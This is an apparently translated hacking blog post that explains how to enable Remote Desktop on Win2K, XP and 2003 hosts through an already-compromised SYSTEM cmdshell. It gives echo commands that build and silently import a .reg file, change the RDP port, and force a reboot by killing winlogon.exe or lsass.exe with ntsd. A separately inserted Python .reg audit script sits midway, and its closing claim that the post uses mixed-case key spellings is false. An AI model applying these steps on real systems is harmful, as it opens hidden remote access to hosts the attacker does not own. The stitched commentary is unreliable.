A simple "green" method for opening the terminal

xiaoxiao 2021-03-06

This way of opening it is green, environmentally friendly and non-polluting ~~ no files need to be uploaded to open the terminal, and it works on Win2K, XP and 2003. This article assumes the other party has already obtained SYSTEM privileges and a cmdshell by some means ~~ and opens the Terminal Service without transferring any files.

First, opening the terminal on Win 2K: write a 3389.reg file with echo, then import it into the registry. The echo commands are as follows:

    echo Windows Registry Editor Version 5.00 >> 3389.reg
    echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >> 3389.reg
    echo "Enabled"="0" >> 3389.reg
    echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >> 3389.reg
    echo "ShutdownWithoutLogon"="0" >> 3389.reg
    echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >> 3389.reg
    echo "EnableAdminTSRemote"=dword:00000001 >> 3389.reg
    echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >> 3389.reg
    echo "TSEnabled"=dword:00000001 >> 3389.reg
    echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >> 3389.reg
    echo "Start"=dword:00000002 >> 3389.reg
    echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >> 3389.reg
    echo "Start"=dword:00000002 >> 3389.reg
    echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >> 3389.reg
    echo "Hotkey"="1" >> 3389.reg
    echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >> 3389.reg
    echo "PortNumber"=dword:00000D3D >> 3389.reg
    echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >> 3389.reg
    echo "PortNumber"=dword:00000D3D >> 3389.reg

Echoing these lines in the cmdshell produces the 3389.reg file; then run

    regedit /s 3389.reg

to import it into the registry. (To change the terminal port, change only the two D3D values above.) Because on Win 2K the change does not take effect immediately as it does on XP, the machine has to be restarted.

A simple way is to use ntsd.exe (which ships with Win 2K and later) to end a critical process, which forces the machine to restart!! For example winlogon.exe or lsass.exe: ending lsass.exe brings up the restart countdown (not very nice ~), while ending winlogon.exe shuts the machine down immediately. The command format is:

    ntsd -c q -p PID

How do you find the PID of the winlogon.exe process ~ The following script lists the PIDs:

    wscript.echo "PID ProcessName"
    for each ps in getobject("winmgmts://./root/cimv2:win32_process").instances_
        wscript.echo ps.handle & vbtab & ps.name
    next

In the cmdshell window, echo the following into 1.vbe (the ^ escapes the & so cmd does not treat it as a command separator):

    echo wscript.echo "pid processname" >> 1.vbe
    echo for each ps in getobject("winmgmts://./root/cimv2:win32_process").instances_ >> 1.vbe
    echo wscript.echo ps.handle ^& vbtab ^& ps.name >> 1.vbe
    echo next >> 1.vbe

After generating 1.vbe, check whether the script came out wrong (it is only four lines; compare it with the version above). Running 1.vbe gives the following result:

    C:\Winnt\System32>cscript 1.vbe
    Microsoft (R) Windows Script Host Version 5.1 for Windows
    Copyright (C) Microsoft Corporation 1996-1999. All Rights Reserved.

    PID     ProcessName
    0       System Idle Process
    8       System
    152     smss.exe
    180     csrss.exe
    200     winlogon.exe
    228     services.exe
    240     lsass.exe
    424     svchost.exe
    472     spoolsv.exe
    512     msdtc.exe
    616     svchost.exe
    628     KAVSvc.EXE
    660     llssrv.exe
    692     nvsvc32.exe
    728     regsvc.exe
    748     MSTask.exe
    776     alter.exe
    900     svchost.exe
    916     WinMgmt.exe
    1088    Dfssvc.exe
    484     Explorer.EXE
    1444    mdm.exe
    1340    Server.exe
    1224    ibguard.exe
    1252    KAVSvcUI.EXE
    1256    ibserver.exe
    1336    internat.exe
    1204    Uspds.exe
    720     bar.exe
    1288    dllhost.exe
    1580    inetinfo.exe
    1672    cmd.exe
    1464    pppoe.exe
    1704    regedit.exe
    316     cscript.exe

From the above you can see that the PID of winlogon.exe is 200, so run the command ntsd -c q -p 200 (replace 200 with the PID of the winlogon.exe process on the machine in question).

Then wait for it to come back up ~~ (ntsd.exe ships with Windows and can end a process of any level.)

Second, opening the terminal on WinXP and Win2003

The REG file that opens it is as follows:

    Windows Registry Editor Version 5.00

    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
    "fDenyTSConnections"=dword:00000000

    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]
    "PortNumber"=dword:00000D3D

    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
    "PortNumber"=dword:00000D3D

Write the REG file with echo like this:

    echo Windows Registry Editor Version 5.00 >> 3389.reg
    echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >> 3389.reg
    echo "fDenyTSConnections"=dword:00000000 >> 3389.reg
    echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >> 3389.reg
    echo "PortNumber"=dword:00000d3d >> 3389.reg
    echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >> 3389.reg
    echo "PortNumber"=dword:00000d3d >> 3389.reg
    regedit /s 3389.reg
    del 3389.reg

Opening the terminal this way needs no restart. To change the port, just change the D3D in the two PortNumber values above to the hexadecimal form of the decimal port you want; convert it with the calculator. Neither opening nor closing the terminal needs a restart, which is really wonderful. To turn the terminal off, just change "fDenyTSConnections"=dword:00000000 to dword:00000001.
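As an added example (not code from the post), here is a defender-side triage script for exactly the kind of .reg artifact both sections above build with echo: it parses the "Windows Registry Editor Version 5.00" format, decodes the dword values (so D3D comes out as 3389 without the calculator), and reports which Terminal Services switches, service start types and listening ports the file would change. The two sample .reg texts are constructed here from the post's own keys; the 6667 port in the second sample is a made-up non-default value used only to show the non-default check firing.

```python
import re

# Constructed sample 1: the XP/2003 .reg content the post writes with echo.
SAMPLE_XP = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]
"PortNumber"=dword:00000d3d

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
"PortNumber"=dword:00000d3d
"""

# Constructed sample 2: the Win2K keys from the post, with the port moved off 3389
# (0x1a0b = 6667, a made-up value) and the mixed-case key spelling the post also uses.
SAMPLE_2K = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"TSEnabled"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
"Start"=dword:00000002

[HKEY_LOCAL_MACHINE\SYSTEM\CURRENTCONTROLSET\CONTROL\TERMINAL Server\Wds\rdpwd\Tds\tcp]
"PortNumber"=dword:00001a0b

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
"PortNumber"=dword:00001a0b
"""

# "name"=value or @=value (default value); backslash escapes inside the name are allowed.
VALUE_RE = re.compile(r'^(?:"((?:[^"\\]|\\.)*)"|@)=(.*)$')


def parse_reg(text):
    """Parse 'Windows Registry Editor Version 5.00' text into {key: {value_name: value}}.

    Key paths and value names are lower-cased because the registry is case-insensitive.
    dword:xxxxxxxx becomes an int, "..." becomes a str, anything else is kept as raw text.
    """
    reg = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].lower()
            reg.setdefault(current, {})
            continue
        m = VALUE_RE.match(line)
        if m is None or current is None:
            continue  # tolerate junk lines instead of aborting the triage
        name = (m.group(1) if m.group(1) is not None else "@").lower()
        value = m.group(2).strip()
        if value.lower().startswith("dword:"):
            reg[current][name] = int(value[6:], 16)
        elif len(value) >= 2 and value.startswith('"') and value.endswith('"'):
            reg[current][name] = value[1:-1]
        else:
            reg[current][name] = value
    return reg


# Keys from the post, lower-cased to match parse_reg's normalisation.
TS_KEY = r"hkey_local_machine\system\currentcontrolset\control\terminal server"
PORT_KEYS = (TS_KEY + r"\wds\rdpwd\tds\tcp", TS_KEY + r"\winstations\rdp-tcp")
SERVICE_KEYS = (r"hkey_local_machine\system\currentcontrolset\services\termservice",
                r"hkey_local_machine\system\currentcontrolset\services\termdd")
DEFAULT_RDP_PORT = 0x0D3D  # 3389, the value the post writes as dword:00000D3D


def audit_terminal_services(reg):
    """Return human-readable findings about Terminal Services changes in a parsed .reg."""
    findings = []
    ts = reg.get(TS_KEY, {})
    if ts.get("fdenytsconnections") == 0:
        findings.append("fDenyTSConnections=0: remote connections allowed (XP/2003 switch)")
    if ts.get("tsenabled") == 1:
        findings.append("TSEnabled=1: Terminal Services enabled (Win2K switch)")
    for key in SERVICE_KEYS:
        if reg.get(key, {}).get("start") == 2:
            leaf = key.rsplit("\\", 1)[-1]
            findings.append(f"{leaf} Start=2: service set to auto-start")
    for key in PORT_KEYS:
        port = reg.get(key, {}).get("portnumber")
        if port is None:
            continue
        leaf = key.rsplit("\\", 1)[-1]
        tag = "default 3389" if port == DEFAULT_RDP_PORT else f"NON-DEFAULT ({port:#06x})"
        findings.append(f"{leaf} PortNumber={port}: {tag}")
    return findings


if __name__ == "__main__":
    for label, sample in (("XP/2003 sample", SAMPLE_XP), ("Win2K sample", SAMPLE_2K)):
        print(label)
        for finding in audit_terminal_services(parse_reg(sample)):
            print("  -", finding)
```

The parser lower-cases key paths on purpose: the post itself spells the same key both as `CurrentControlSet\Control\Terminal Server` and as `CURRENTCONTROLSET\CONTROL\TERMINAL Server`, and the registry treats them as identical, so an audit that compared paths case-sensitively would miss one of them. Running it on a .reg found on a host (or on output from `reg export`) gives a quick answer to "does this file turn RDP on, and on which port" before anyone opens it in regedit.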

Please credit the original address when reposting: https://www.9cbs.com/read-75502.html
